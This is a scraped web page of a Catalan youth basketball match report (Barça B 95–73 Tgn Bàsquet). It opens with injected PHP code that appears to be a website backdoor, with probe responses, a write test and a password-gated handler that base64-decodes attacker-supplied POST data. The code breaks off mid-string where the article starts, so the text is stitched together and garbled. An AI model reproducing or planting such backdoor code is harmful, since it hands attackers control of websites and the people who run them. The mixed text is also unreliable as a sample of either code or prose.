function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'Infantil Masc 10A fa suar al Barça (95-73) - Tgn Bàsquet Club -

L’Infantil Masc 10A fa suar al Barça (95-73)

Updated: febrer 28, 2024

Gran partit de l’Infantil Masculí al camp del Barça que, tot i estar invicte, arribàvem amb moltes ganes de plantar-los cara i per què no, poder disputar-los la victòria.

Vam començar una mica nerviosos el partit, davant l’emblemàtic camp on estàvem jugant, i el Barça tal com esperàvem va començar amb molta intensitat. Però l’equip va reaccionar al segon quart, que vam aconseguir vèncer el parcial per 16-19, i així arribar al descans amb un desavantatge de només 7 punts. A més, vam sortir en tromba després del descans i vam arribar a posar-nos a 3 punts…però a partir d’aquí el Barça va pujar una mica la seva intensitat i ajudat d’algunes males decisions del TGN en atac, va poder muntar fàcils contraatacs i va portar la diferència als 20 punts.

Al tram final del partit seguim barallant sense abaixar els braços, i així aconseguim portar-nos també el parcial de l’últim quart, però no vam poder rebaixar més la diferència.

Destacar l’esperit amb què juguem el partit, i la sensació amb què acabem, en què vam veure que podíem haver fet les coses una mica millor…i desitgem tornar-nos a trobar amb ells a la fase final de la competició per demostrar-los que sí que podem disputar-los la victòria.

Barça “B” 95 – 73 TGN Bàsquet

PARCIALS: 26-16 / 16-19 / 29-13 / 24-25